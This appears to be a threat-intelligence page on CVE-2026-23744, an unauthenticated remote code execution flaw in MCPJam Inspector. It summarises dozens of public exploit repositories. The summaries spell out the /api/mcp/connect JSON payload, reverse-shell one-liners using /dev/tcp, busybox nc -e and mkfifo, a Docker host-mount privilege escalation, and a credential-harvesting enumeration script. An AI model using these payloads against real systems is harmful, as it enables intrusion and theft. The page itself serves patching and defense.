CVE-2026-23744 is an unauthenticated remote code execution vulnerability in MCPJam inspector, a local-first development platform for MCP servers. Versions 1.4.2 and earlier expose an HTTP API that accepts attacker-controlled MCP server command and argument data and can install and execute the supplied server. The service binds to all network interfaces by default, making this functionality remotely reachable rather than limited to localhost.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
43 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (9 hidden).
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. The repository contains three files: a single executable exploit script (CVE_2026_23744.py), a README describing the vulnerability and usage, and a LICENSE file. The Python script is the only code file and serves as the clear entry point. The exploit targets the unauthenticated MCPJam Inspector API endpoint /api/mcp/connect, constructed as http(s)://<target>:6274/api/mcp/connect by default. It first performs a basic reachability/vulnerability check by POSTing an empty JSON object and interpreting a non-403 response as likely vulnerable. If exploitation is enabled, it builds a JSON object with serverConfig.command set to bash and serverConfig.args containing a base64-decoded bash reverse shell one-liner. That payload is then POSTed to the same endpoint. The reverse shell command is bash -i >& /dev/tcp/<lhost>/<lport> 0>&1, encoded in base64 and executed via bash -c to reduce quoting issues. Operationally, the script supports command-line arguments for target host, target port, callback host, callback port, HTTPS selection, and a check-only mode. It disables TLS verification and suppresses urllib3 warnings, indicating it is intended to work against self-signed HTTPS deployments as well. Success is inferred either from the HTTP response code or from a ReadTimeout during exploitation, which the author treats as an indicator that the shell likely spawned. Overall, this is a real exploit rather than a detector-only script: it contains a working command-injection payload and is designed to achieve remote code execution with a reverse shell callback. It is not part of a larger exploit framework and is best classified as an operational standalone PoC.
This repository is a minimal Python proof-of-concept exploit for CVE-2026-23744. It contains three files: a small .gitignore, requirements.txt listing requests, and a single executable script, exploit.py, which is the sole entry point and core logic. The script uses argparse to require a target base URL, attacker IP, and attacker port. It disables TLS certificate warnings and sends a POST request to the target endpoint /api/mcp/connect. The exploit capability is remote command execution via a crafted JSON body under serverConfig. It instructs the target to run busybox with arguments equivalent to: nc <attacker_ip> <attacker_port> -e /bin/bash. If the vulnerable service honors these fields, the target initiates a reverse shell back to the attacker. This makes the exploit operational rather than a mere detector, because it includes an active payload and callback mechanism. There is no framework usage, no modularization, and no detection-only logic. Success handling is simplistic: if the HTTP response status is anything other than 404, the script prints that the PoC was successfully used. The repository purpose is straightforward: provide a compact, direct exploit to trigger a reverse shell against a service exposing the vulnerable MCP-style API endpoint.
Small PoC repository containing one Python exploit script, a README, and a license file. The main file, CVE_2026_23744.py, is a standalone Python 3 exploit using the requests library. It targets CVE-2026-23744, described as an unauthenticated command injection / RCE flaw in MCPJam Inspector <= 1.4.2. The script builds a target URL from user input and attacks the /api/mcp/connect endpoint, first sending an empty JSON POST as a basic reachability/vulnerability check, then sending a crafted JSON object with serverConfig.command set to bash and serverConfig.args containing a base64-decoded reverse-shell command. The payload is intended to cause the service to spawn a bash process that connects back to the attacker via /dev/tcp on a configurable host and port. The exploit supports HTTP or HTTPS, configurable target and callback ports, and a check-only mode. It disables TLS verification and treats a ReadTimeout during exploitation as a likely sign that the shell was spawned. The README documents the vulnerability, expected usage, and an example successful reverse shell, but the repository itself does not include an integrated listener despite the README mentioning one. Overall, this is a real, standalone operational PoC for unauthenticated web-exposed RCE with a hardcoded reverse-shell payload pattern.
This repository is a small standalone exploit PoC for CVE-2026-23744 affecting MCPJam Inspector (@mcpjam/inspector) version 1.4.2 and earlier. The repository contains two files: a README describing the vulnerability and usage, and a single Python entry point, exploit.py, implementing the attack flow. The exploit is operational rather than a simple detector. It performs a local reachability check by invoking ping against the supplied target IP, base64-encodes a bash reverse shell payload, launches a local netcat listener in a new terminal using x-terminal-emulator, and then sends an HTTP POST request with JSON content to a user-supplied API path on the target. The crafted JSON places a bash command inside serverConfig.args so the remote service decodes and executes the payload, resulting in a reverse shell callback to the attacker on port 4444. Primary exploit capability: unauthenticated remote code execution over HTTP against an exposed API control plane. The code does not include target auto-discovery, authentication bypass logic beyond direct unauthenticated access, persistence, privilege escalation, or post-exploitation modules. It is a focused single-shot RCE launcher. Notable implementation details: - Target URL is dynamically built as http://<target_ip>:<target_port>/<target_api>. - The README identifies /api/mcp/connect as the intended vulnerable endpoint. - The payload is bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1, base64-encoded and executed via bash -c. - The script requires explicit operator inputs for target IP, API path, attacker IP, and target port. - Although the argparse help text says the port has a default of 6274, the code actually marks -p/--port as required. Overall purpose: provide a reproducible PoC to demonstrate and validate unauthenticated RCE against exposed MCPJam Inspector instances by forcing the target to execute an attacker-controlled reverse shell command through the vulnerable API.
Small standalone Python exploit repository with 4 files: a single main exploit script (exploit.py), README, requirements, and license. The repository is not part of a larger exploitation framework. The exploit targets CVE-2026-23744, described as an unauthenticated RCE in MCPJam Inspector <=1.4.2. The Python script is the clear entry point and implements an operational network/web exploit rather than a detector. Based on the visible code and README, its core purpose is to send malicious data to the vulnerable MCPJam Inspector HTTP interface—specifically the documented /api/mcp/connect endpoint—to achieve remote command execution. Capabilities include dynamic payload generation, multiple reverse-shell formats (bash, socat, python3, python2, netcat, mkfifo+nc, plus Perl/PHP/Base64 per documentation), command execution mode with output capture, target scanning from a file, rate limiting/delays, session management, fingerprinting, proxy support, retries/timeouts, cleanup routines, and optional automatic local netcat listener startup. The payload generator embeds attacker-supplied callback IP/port values and attempts fallback mechanisms to improve reliability across different target environments. Fingerprintable observables include the vulnerable web path /api/mcp/connect, reverse-shell callback destinations, shell binaries such as /bin/bash, the bash /dev/tcp mechanism, and temporary FIFO path /tmp/f used by one fallback payload. Overall, this is an operational PoC/utility for unauthenticated RCE exploitation with practical post-exploitation conveniences, not merely a scanner or README-only repository.
Repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. Structure is minimal: one executable Python script (CVE-2026-23744.py), a README with usage and references, requirements.txt listing httpx, and a .gitignore. The exploit is not part of a larger framework. The main script uses argparse for CLI handling and httpx.AsyncClient for network delivery. It normalizes a user-supplied base URL, appends /api/mcp/connect, and sends a crafted JSON body containing serverConfig.command set to bash and serverConfig.args set to ['-c', <attacker command>]. This directly targets the missing-authentication flaw described in the repository comments and README. The exploit supports two primary modes: arbitrary command execution via --cmd and a bash TCP reverse shell via --reverse-shell with --lhost/--lport. It also includes dry-run and debug modes for payload inspection, TLS verification toggle, timeout control, and a confirmation prompt before sending reverse-shell payloads. Operationally, the exploit’s capability is unauthenticated remote code execution against exposed MCPJam Inspector instances. It does not include post-exploitation automation, persistence, or lateral movement logic; instead it focuses on reliably triggering command execution through the vulnerable web API. Because it includes a working payload path and reverse shell generation, it is best classified as an operational PoC rather than a simple detection script.
This repository contains a single Python exploit script, exploit.py, implementing a remote code execution attempt labeled for CVE-2026-23744. The script uses argparse to require three inputs: a base target URL, an attacker callback IP (lhost), and callback port (lport). It constructs a POST request to the target endpoint /api/mcp/connect and sends JSON containing a serverConfig object with command set to /bin/bash and args set to execute a base64-decoded bash reverse shell. The reverse shell payload is generated dynamically from user input, encoded with base64, and executed through bash -c to reduce quoting issues. The exploit disables TLS certificate verification warnings and sends the request with requests.post(..., verify=False), indicating it can be used against HTTPS targets with invalid/self-signed certificates. Structurally, the repository is minimal: one Python file with imports, argument parsing, payload construction, a single exploit() function that performs the POST request, and a main() wrapper. Its purpose is straightforward exploitation rather than detection: trigger unsafe command execution via the MCP connect API and obtain an interactive reverse shell if the target can reach the attacker listener.
This repository contains a single Python exploit script, CVE-2026-23744.py, targeting MCPJam Inspector versions 1.4.2 and earlier. The script is a standalone asynchronous HTTP client using httpx and argparse. Its purpose is to achieve remote code execution by POSTing crafted JSON to the target's /api/mcp/connect endpoint. The malicious JSON sets serverConfig.command to bash and passes a reverse-shell command through args, causing the target to initiate a bash TCP connection back to the attacker-supplied host and port. Repository structure is minimal: one Python file with all exploit logic, CLI parsing, and execution flow. The main function builds the payload, joins the supplied base URL with /api/mcp/connect, sends the POST request, and prints the server response. Command-line options are -u/--url for the target base URL, -l/--lhost for the attacker IP, and -p/--lport for the attacker port. Main exploit capability: unauthenticated or API-reachable remote code execution leading to a reverse shell, depending on target exposure and behavior of the vulnerable endpoint. There is no detection-only logic, no framework integration, and no payload customization beyond attacker host/port. Because it includes a working hardcoded reverse-shell payload, it is best classified as OPERATIONAL rather than a simple proof of concept.
This repository is a small standalone Python exploit for CVE-2026-23744 affecting MCPJam Inspector. It contains only two files: a README with installation/usage instructions and one executable script, mcpExec.py, which is the sole exploit implementation. The script uses argparse for CLI input, rich for console output, and requests to send an HTTP POST request to the target. Operational flow: the user supplies a target base URL, attacker IP, and attacker port. The exploit appends /api/mcp/connect to the provided URL and submits JSON containing a crafted serverConfig object. That object sets type to stdio and command to python3, with a -c argument containing a Python reverse-shell one-liner. If the target processes this configuration unsafely, it executes python3 on the target, connects back to the attacker-controlled IP:port, duplicates the socket onto stdin/stdout/stderr, and launches /bin/bash -i. The exploit includes only minimal success validation. It treats a specific HTTP 500 response body as a likely success indicator and also notes that a request timeout may still mean exploitation succeeded if the reverse shell was received. There is no post-exploitation automation, target discovery, authentication handling, or payload customization beyond the supplied callback IP/port. Overall, this is an operational but simple RCE-to-reverse-shell exploit targeting a single web API endpoint.
This repository is a small standalone Python proof-of-concept exploit for MCPJam Inspector RCE, identified in the README as CVE-2026-23744 affecting @mcpjam/inspector versions 1.4.2 and earlier. The repo contains one functional exploit script (exploit.py), a README with usage instructions and screenshots, a requirements.txt listing the requests dependency stack, and several .obsidian workspace metadata files unrelated to exploitation. The exploit flow is straightforward: exploit.py accepts a target IP and an attacker-supplied shell command from the command line, polls http://<target_ip>:6274 until the service responds with HTTP 200, then sends a POST request to http://<target_ip>:6274/api/mcp/connect. The JSON payload sets serverConfig.command to "sh" and serverConfig.args to ["-c", <command>], causing the target to execute arbitrary shell commands if vulnerable. The script also passes a DISPLAY environment variable, which supports GUI command demonstrations such as xcalc. This is an actual exploit rather than a detector: it does not merely check for vulnerability, but attempts to trigger code execution directly. It is operational but basic, with a hardcoded exploitation method and user-provided command payload. No framework integration, persistence, lateral movement, or post-exploitation automation is present. The main capability is unauthenticated remote command execution against exposed MCPJam inspector instances listening on TCP port 6274.
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. The repo contains only two files: a README describing the vulnerability, impact, and usage, and a single executable script, exploit.py, which is the main entry point. The exploit is not part of a larger framework. The exploit capability is straightforward: it sends an unauthenticated HTTP POST request to the MCPJam Inspector management endpoint on port 6274 at /api/mcp/connect. The JSON body abuses the serverConfig feature to instruct the target service to launch an attacker-chosen process. In this implementation, the process is hardcoded as busybox with arguments equivalent to 'nc <attacker_ip> <attacker_port> -e /bin/bash', aiming to create a reverse shell from the target back to the attacker. This makes the exploit an operational RCE PoC rather than a mere detector. Code structure is minimal. exploit.py imports argparse, requests, and sys; parses three required CLI arguments (target, local-host, local-port); constructs the URL by appending ':6274/api/mcp/connect' to the provided target; builds the malicious JSON payload; and submits it with requests.post(..., verify=False). It then prints the HTTP status code and response body. There is no target fingerprinting, no retry logic, no payload customization beyond callback IP/port, and no evasion or post-exploitation automation. Notable operational assumptions and limitations: the target must expose the vulnerable API remotely; the service must accept unauthenticated requests; the target environment must have busybox and a netcat implementation supporting '-e'; and outbound network connectivity from the target to the attacker listener must be allowed. Because the payload is hardcoded and environment-dependent, reliability may vary across targets.
This repository contains a single-purpose Python validator for CVE-2026-23744 in MCPJam Inspector rather than a full exploit framework. The repo is small and straightforward: one main Python script (mcpjam_authorized_validator.py), documentation files (README, SECURITY, assessment template), and a GitHub Actions workflow that only checks syntax and verifies the authorization guard. The exploit logic is entirely in mcpjam_authorized_validator.py. Core capability: the script performs unauthenticated remote command execution validation against MCPJam Inspector by POSTing to /api/mcp/connect with a crafted serverConfig that instructs the target to launch python3 with an inline responder. That responder runs a fixed shell command gathering limited host context (id, hostname, pwd, uname -sr), truncates output to 4096 bytes, base64-encodes it, and returns it through MCP initialization metadata. The validator then fetches /api/mcp/servers/init-info/{session_id}, decodes the evidence, reports whether the target appears vulnerable, and finally attempts cleanup via DELETE /api/mcp/servers/{session_id}. The code includes some safety constraints: it requires --authorized before running, validates target format and DNS resolution, restricts timeout range, does not accept arbitrary commands from the operator, and uses a hardcoded evidence command instead of a customizable payload. Despite the defensive framing, this is still exploit code because it actively triggers the vulnerable behavior and causes remote process execution on the target. It is best classified as an operational, bounded validator for unauthenticated RCE rather than a mere detector or passive scanner.
Small repository containing a single Python exploit script and a README describing the vulnerability. The Python file CVE-2026-23744-ReverShell.py is the main entry point and uses the requests library to POST JSON to the target endpoint /api/mcp/connect. The exploit abuses unsafe handling of serverConfig.command and serverConfig.args by supplying command='bash' and args=['-c', 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1'], causing the target to spawn a reverse shell. The script includes minimal signal handling for Ctrl-C and prints the HTTP response status and body after sending the request. The README explains that MCPJam Inspector allegedly exposed the endpoint by binding to 0.0.0.0 and that legitimate application behavior already used the command and args fields, making this an RCE via insufficient validation rather than a purely synthetic payload. Overall, this is a straightforward operational PoC for unauthenticated or network-reachable remote command execution leading to reverse shell access.
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting mcpJam v1.4.2. The repository contains two files: a single executable exploit script (CVE-2026-23744.py) and a README describing usage, examples, and technical details. The exploit is not part of a larger framework. The Python script takes two arguments: a target base URL and an operator-supplied command. It constructs a JSON object with a malicious serverConfig that sets command to /bin/bash and passes a -c argument that echoes a base64-encoded version of the supplied command, decodes it with base64 -d, and pipes it into bash. The script then sends this JSON in an HTTP POST request to the target endpoint /api/mcp/connect. It prints both the generated request body and the raw server response, which helps validate exploitation and troubleshoot failures. Primary exploit capability is remote arbitrary command execution over HTTP against a vulnerable mcpJam instance. Because the command is user-controlled, the exploit can deliver simple test commands, system enumeration, or reverse shell payloads. The payload is basic but functional, making this an operational exploit rather than a mere detection script or documentation-only repository. Notable observables include the vulnerable endpoint /api/mcp/connect, the target-side executable path /bin/bash, and the static request field serverId set to mymcp. The README also includes example callback and test endpoints such as 10.10.14.70:4444 and http://10.10.14.70:8888, but these are illustrative rather than hardcoded in the exploit logic.
This repository is a small Python proof-of-concept exploit for CVE-2026-23744. It contains two files: a README describing the issue and usage, and a single executable script, exploit.py. The script uses the requests library to send an HTTP POST request to the target application's /api/mcp/connect endpoint with a crafted JSON body containing a malicious serverConfig object. That object specifies command execution parameters intended to launch busybox nc and connect back to an attacker-controlled IP and port with '-e /bin/bash', providing a reverse shell. The exploit is straightforward and hardcoded, with placeholders for the target URL and callback listener values. There is no framework integration, no target discovery logic, and no vulnerability verification beyond printing the HTTP status code and response body. Overall, the repository's purpose is direct remote code execution via unsafe handling of MCP connection configuration in a web-exposed API.
This repository contains a single Python proof-of-concept exploit, exploit.py, which uses the requests library to send a crafted JSON POST request to a target HTTP API endpoint: /api/mcp/connect. The script is minimal and operational: it includes a SIGINT handler, hardcoded placeholders for the target URL, attacker callback IP, and callback port, and no auxiliary files or framework integration. Its purpose is to exploit an apparent command-execution flaw in an MCP-related API by supplying a serverConfig object that instructs the target to run busybox with arguments equivalent to 'nc <attacker_ip> <attacker_port> -e /bin/bash'. If the endpoint accepts and executes this configuration, the victim initiates a reverse shell to the attacker. The exploit is not a scanner or detector; it is intended for direct exploitation and requires manual operator customization before use.
This repository is a small standalone exploit repo with 2 files: a README and a Python exploit script. The README describes an unauthenticated remote code execution issue in MCPJam MCP Proxy Inspector, attributed to CVE-2026-23744, and explains that the vulnerable HTTP endpoint /api/mcp/connect accepts attacker-controlled serverConfig.command and serverConfig.args values that are passed to a process spawner without authentication or validation. The exploit script, exploit.py, is the sole code file and clear entry point. It uses argparse for CLI handling and requests/urllib3 for HTTP communication. Operationally, the script first probes the target over HTTP at http://<target>:<port> until it receives HTTP 200 or times out. It then constructs a JSON payload containing serverConfig.command='sh' and args=['-c', <bash reverse shell>] and POSTs it to http://<target>:<port>/api/mcp/connect. The embedded payload is a bash reverse shell using /dev/tcp to connect back to an attacker-supplied lhost:lport. The script treats a POST timeout as a likely success condition, based on the assumption that the target process is blocked servicing the reverse shell. It also logs connection resets as possible partial success. The exploit’s main capability is unauthenticated network-based RCE against exposed MCPJam instances, with the provided payload yielding interactive shell access under the MCPJam process account. It is not merely a detector; it actively delivers a malicious payload. The code is relatively simple and hardcodes a bash reverse shell rather than offering modular payload selection, so OPERATIONAL is the best maturity fit rather than WEAPONIZED. There are some internal inconsistencies in the repository metadata: the README header says affected versions are <= 1.4.2 and patched in >= 1.4.3, while the exploit.py banner/constants say <= 1.2.3 and >= 1.2.4. Despite that discrepancy, both files consistently describe the same exploitation method and endpoint. The key fingerprintable target is the unauthenticated MCPJam HTTP endpoint /api/mcp/connect on port 3000 by default.
Small two-file repository containing a Bash proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector. The README describes the issue in Spanish, identifies the vulnerable endpoint as /api/mcp/connect, and explains that MCPJam Inspector versions 1.4.2 and earlier may allow unauthenticated remote code execution because the service listens on 0.0.0.0 by default. The exploit script, exploit.sh, is the main entry point and implements a straightforward operational attack flow: parse CLI arguments for target and callback host, build a JSON body with serverConfig.command set to bash and args containing a reverse-shell one-liner, then POST that body to the target endpoint using curl. The script supports HTTP or HTTPS, configurable target and callback ports, and prints curl status hints to help the operator infer whether code execution likely succeeded. There is no detection-only logic; the repository is a real exploit PoC that attempts direct unauthenticated RCE and returns a reverse shell if the target executes the supplied command.
This repository is a small Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. It contains one main exploit script (CVE-2026-23744.py), a README describing the vulnerability and usage, and a requirements file listing requests, pwntools, and urllib3. The exploit targets the MCPJam Inspector endpoint /api/mcp/connect by sending a crafted JSON body with serverConfig.command set to /bin/bash and attacker-controlled arguments. In normal mode, it base64-encodes a bash reverse shell command and instructs the target to decode and execute it, causing the victim to connect back to the attacker over TCP. In test mode, it starts a simple local HTTP server on attacker port 80 and sends a payload that makes the target run curl against http://<lhost>/rce-ok, serving as a non-interactive verification of code execution. Repository structure is straightforward: the Python script handles argument parsing, payload construction, HTTP POST delivery, and optional callback server setup via threading. The exploit disables TLS certificate warnings and sends requests with verify=False, allowing use against HTTPS targets with invalid certificates as well. There is no advanced evasion, authentication bypass logic, or payload customization framework beyond user-supplied target URL and callback host/port. Overall, this is a functional unauthenticated web/network RCE PoC with an operational reverse-shell payload rather than a mere detector.
This repository is a small standalone Python exploit for an unauthenticated RCE in MCPJam Inspector v1.4.2. It contains two files: a README describing the issue and usage, and script.py implementing the exploit. The script uses requests.Session to communicate with the target over HTTP, first probing /api/mcp/servers to confirm the service is reachable, then POSTing a crafted JSON body to /api/mcp/connect. The malicious payload places attacker-controlled values into serverConfig.command and serverConfig.args, specifically invoking bash -c with a reverse-shell one-liner that connects to the supplied listener host and port. The exploit is operational rather than a mere PoC because it includes a working payload and command-line options for target host, target port, callback host, and callback port, but payload customization is basic and hardcoded to bash reverse shell behavior. No framework is used, no persistence or privilege escalation is included, and the repository’s sole purpose is initial remote command execution and shell access against exposed vulnerable MCPJam Inspector instances.
This repository is a small standalone proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. It contains two files: a README with usage details and a single Python exploit script. The script uses the requests library and exposes CLI options for attacker listener host/port and remote target host/port. Its structure is simple: get_endpoint() builds the target URL, get_payload() constructs a reverse-shell command, parse_args() handles CLI input, is_target_vulnerable() sends a probe POST request with an empty serverConfig to /api/mcp/connect and treats HTTP 500 as an indicator of likely vulnerability, and exploit() sends a second crafted POST request with serverConfig.command and args set to a busybox netcat reverse shell. The exploit capability is remote code execution over HTTP by abusing MCP server installation/execution behavior in the Inspector API. The main fingerprintable target is the HTTP endpoint /api/mcp/connect on the configured host and port. The payload is hardcoded and basic rather than modular, so this is best classified as an operational PoC rather than a framework-integrated or heavily weaponized exploit.
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 / GHSA-232v-j27c-5pp6 affecting MCPJam Inspector. The repository contains only two files: a Python exploit script and a short README with usage instructions. The main entry point is CVE-2026-23744.py. The exploit accepts a target base URL, attacker IP, and attacker port. It constructs a POST request to the target endpoint /api/mcp/connect with a JSON body containing serverConfig.command set to 'busybox' and arguments equivalent to 'nc <attacker_ip> <attacker_port> -e /bin/bash'. If the target unsafely processes this configuration, the result is remote command execution and a reverse shell callback to the attacker. TLS certificate validation is explicitly disabled, and the script prints both the payload and HTTP response for operator feedback. Operationally, this is an exploitation script rather than a detector: it does not merely check for vulnerability, but attempts to obtain code execution. The payload is hardcoded to a BusyBox/netcat reverse shell, so it is more than a bare POC but not highly flexible or framework-integrated, making OPERATIONAL the best maturity fit. Fingerprintable observables include the vulnerable API path /api/mcp/connect, the fixed serverId value 'mcp_test_server', the use of 'busybox', 'nc', and '/bin/bash' on the target, and the attacker-supplied reverse-shell callback IP/port. The README demonstrates expected usage with a netcat listener on port 4444 and an example target URL of http://TARGET.com.
This repository is a minimal proof-of-concept exploit consisting of a single Python script (poc.py), a short README with CLI usage, and a GPL license. The exploit targets CVE-2026-23744 by sending a POST request to the target URL plus /api/mcp/connect. The JSON body supplies a serverConfig object that instructs the target to execute node with a malicious inline JavaScript snippet. That JavaScript uses Node's net and child_process modules to spawn bash and connect back to an attacker-specified host and port, effectively providing remote code execution with a reverse shell if the target honors the supplied command configuration. The script disables TLS verification, accepts attacker callback parameters via --lhost and --lport, and prints the HTTP response body. There is no target validation, authentication handling, or reliability logic; it is a straightforward operational PoC with a hardcoded reverse-shell payload rather than a detection-only script.
This repository is a small standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. The repo contains only two files: POC.py, which is the exploit, and README.md, which documents usage, affected versions, and references. POC.py is a command-line exploit script using requests and argparse. It accepts a target base URL, attacker listener IP/port, and a payload method. It constructs the target endpoint by appending /api/mcp/connect to the supplied URL, performs an initial POST with an empty JSON object as a lightweight probe, and interprets HTTP 401 as patched/authenticated and HTTP 404 as wrong path or port. If reachable, it sends a second POST containing a JSON object with serverConfig.command and serverConfig.args, abusing the endpoint's ability to spawn host processes directly. The exploit's main capability is unauthenticated remote code execution over HTTP, with immediate post-exploitation via reverse shell. It includes three hardcoded payload options: a busybox netcat shell, a bash /dev/tcp shell, and a python3 socket reverse shell. These are operational rather than merely demonstrative because they provide direct shell access, but payload customization is limited to the built-in methods and attacker-supplied LHOST/LPORT. The primary fingerprintable target is the MCPJam Inspector API endpoint /api/mcp/connect. The exploit also reveals expected request structure through the JSON keys serverConfig and serverId. From the documentation, the vulnerable service reportedly binds to 0.0.0.0 by default, increasing remote exposure. Overall, this is a concise, functional unauthenticated RCE exploit intended to gain a reverse shell on exposed Linux hosts running vulnerable MCPJam Inspector versions.
This repository is a minimal standalone Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector <= 1.4.2. The repo contains only two files: a single Python exploit script and a README with usage notes. The exploit uses argparse to collect a target base URL plus attacker callback IP and port, then sends an HTTP POST request to the target's /api/mcp/connect endpoint using the requests library. The JSON body abuses the serverConfig.command and serverConfig.args fields by setting command to bash and args to ['-c', '<reverse shell>'], indicating the vulnerability is unsafe command execution through insufficient sanitization of user-controlled process-launch parameters. The included payload is a hardcoded bash reverse shell using /dev/tcp, so successful exploitation yields remote code execution and an interactive shell back to the attacker listener. No evasion, staging, persistence, or target validation logic is present; it is a straightforward operational exploit rather than a detection script. The code disables TLS verification and uses no timeout limit, but otherwise has very little complexity.
This repository contains a small standalone exploit kit for CVE-2026-23744 affecting MCPJam Inspector, plus a separate local enumeration helper for post-exploitation on Linux targets. The structure is simple: README.md documents the intended HackTheBox-style attack chain, exploit.py is the actual remote exploit, and enum.py is a host enumeration script for follow-on discovery and privilege escalation. exploit.py is the main exploit. It is a Python script using requests that targets the unauthenticated POST endpoint /api/mcp/connect on an MCPJam Inspector instance, defaulting to port 6274 over HTTP unless --ssl is specified. It first performs a probe by POSTing empty JSON to determine whether authentication is enforced. The script treats HTTP 403 as patched and most other HTTP responses as evidence that the endpoint exists without auth. If exploitation proceeds, it builds a JSON payload with serverConfig.command set to bash and serverConfig.args containing a base64-decoded bash reverse shell one-liner. That payload is sent to the same endpoint, attempting to coerce the server into spawning bash and connecting back to the attacker listener. This gives the exploit clear unauthenticated network RCE capability with a hardcoded but operator-supplied reverse-shell callback. The payload behavior is straightforward and operational rather than framework-grade: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1 is base64-encoded and executed via bash -c "echo <b64> | base64 -d | bash". The script includes basic operator conveniences such as banner suppression, check-only mode, HTTP/HTTPS selection, and simple response interpretation for success/failure. enum.py is not the exploit itself; it is a local Linux enumeration utility intended to be run after gaining shell access. It gathers system info, open ports, Python/Jupyter/MCP artifacts, shell history, configs, processes, privilege-escalation vectors, and npm credentials. It inspects numerous local files and directories such as /etc/os-release, /etc/passwd, /proc/net/tcp, /home, /root, and /etc, and searches for secrets like tokens and credentials. This makes it a post-exploitation support tool rather than a detection-only script. The README describes a broader attack path beyond the exploit code: initial RCE as a low-privileged user, port-forwarding to local Jupyter on 127.0.0.1:8888, access to an OPSMCP API on local port 5000, reading /opt/opsmcp/server.py, dumping /root/.ssh/id_rsa, and SSHing to root@devhub.htb. Those later steps are documented only; they are not automated by exploit.py. Overall, the repository’s purpose is to provide a practical unauthenticated RCE proof-of-concept for CVE-2026-23744 and a companion enumeration script to assist manual post-exploitation.
This repository is a minimal Python proof-of-concept exploit consisting of one executable script and a short README. The main file, CVE-2026-23744.py, uses argparse to accept a target base URL (-u), attacker callback host (-i), and callback port (-p). It constructs a POST request to the target endpoint /api/mcp/connect and submits a JSON body containing a serverConfig object with attacker-controlled execution parameters. Specifically, it asks the target to run busybox with arguments equivalent to 'nc <LHOST> <LPORT> -e /bin/bash', which is a classic reverse-shell payload. The script then prints the HTTP status code and response body. The exploit's core capability is remote command execution leading to an interactive reverse shell, assuming the target service accepts and executes the supplied configuration. It is not a scanner or detector; it directly attempts exploitation. The code is operational but basic: the payload is hardcoded to a busybox/netcat reverse shell and offers no alternate payload logic, target validation, authentication handling, or listener setup. The README only provides a one-line usage example and an image reference, with no additional exploit logic. Structurally, the repository is very small: one Python exploit script and one markdown documentation file. There is no framework usage, no modularization, and no obfuscation. The most important fingerprintable target artifact is the HTTP API path /api/mcp/connect, which appears to be the vulnerable endpoint. The exploit also reveals target-side execution dependencies: busybox, nc, and /bin/bash.
This repository contains a single standalone Python exploit script, exploit.py. It is an operational remote code execution tool rather than a detector. The script targets a network-accessible HTTP service on port 6274 and specifically abuses the /api/mcp/connect endpoint by sending a crafted JSON body containing serverConfig.command and serverConfig.args. The exploit hardcodes execution through 'sh -c <command>', enabling arbitrary shell command execution on the remote host. Repository structure is minimal: one Python file with helper routines for colored output, local IP discovery, listener checking, reverse shell payload generation, and a main CLI dispatcher. The workflow is: determine/derive attacker IP, optionally verify a reverse-shell listener, test target reachability on TCP/6274, poll the base HTTP service for readiness, then POST the malicious payload to /api/mcp/connect. Capabilities include direct command execution and multiple built-in reverse shell options: bash, alternate bash, python3, python2, netcat, alternate netcat using /tmp/f, socat, telnet, and perl. The script supports interactive payload selection as well as shortcut flags for quick bash or python reverse shells. It appears intended for Linux-like targets because the payloads rely on /bin/sh, /dev/tcp, mkfifo, and common Unix utilities. Fingerprintable observables are limited and mostly target-derived: HTTP requests to http://<target>:6274 and POSTs to http://<target>:6274/api/mcp/connect, plus a local UDP connect to 8.8.8.8:80 for attacker IP discovery. No external C2 infrastructure or hardcoded victim IPs/domains are embedded. Overall, this is a compact single-file RCE exploit with practical post-exploitation shell delivery options.
This repository is a small, single-purpose exploit repo containing one Python exploit script and a README. The main file, CVE-2026-23744.py, is a standalone Python 3 exploit that targets MCPJam Inspector <= 1.4.2 and abuses the /api/mcp/connect API to achieve unauthenticated remote code execution. It constructs a JSON body with serverConfig.command set to bash and serverConfig.args containing attacker-controlled shell code, then sends it with requests.post(). The exploit is not just an RCE proof of concept; it implements a full attack chain. After initial command execution, it writes a base64-encoded helper script to /tmp/.x.sh, makes it executable, and invokes it through `sg docker`. That helper script starts a privileged Docker container using the image `privatebin/nginx-fpm-alpine:2.0.2`, mounts the host filesystem at /mnt, chroots into the host root, and launches a bash reverse shell to the attacker. This makes the exploit operational rather than a simple detection or validation script. Repository structure is minimal: the README explains the vulnerability, assumptions, and usage, while the Python script handles argument parsing, URL construction, payload generation, and HTTP delivery. The exploit supports configurable target host, scheme, port, endpoint path, timeout, and verbose mode. The default target path is /api/mcp/connect over HTTPS on port 443. Overall, the repository’s purpose is to provide an end-to-end exploit for initial access plus root privilege escalation on the described target environment.
This repository is a minimal Python proof-of-concept exploit for CVE-2026-23744 affecting MCPJam Inspector 1.4.2 and earlier. The repo contains only two files: a README describing the vulnerability and usage, and a single executable script, run.py. The script uses argparse to accept --target and --command, constructs a POST request to the target's /api/mcp/connect endpoint, and submits JSON containing a crafted serverConfig object with an attacker-controlled command and arguments. The exploit's core capability is remote command execution via the application's MCP server connection mechanism. It does not include advanced payload generation, staging, authentication bypass logic, or target discovery; instead it directly delivers a hardcoded malicious configuration with serverId set to "exploit". The README indicates the vulnerability stems from the service listening on 0.0.0.0 by default, making the API remotely reachable when it should be restricted to 127.0.0.1. Overall, this is a straightforward operational exploit script rather than a detection tool or framework module.
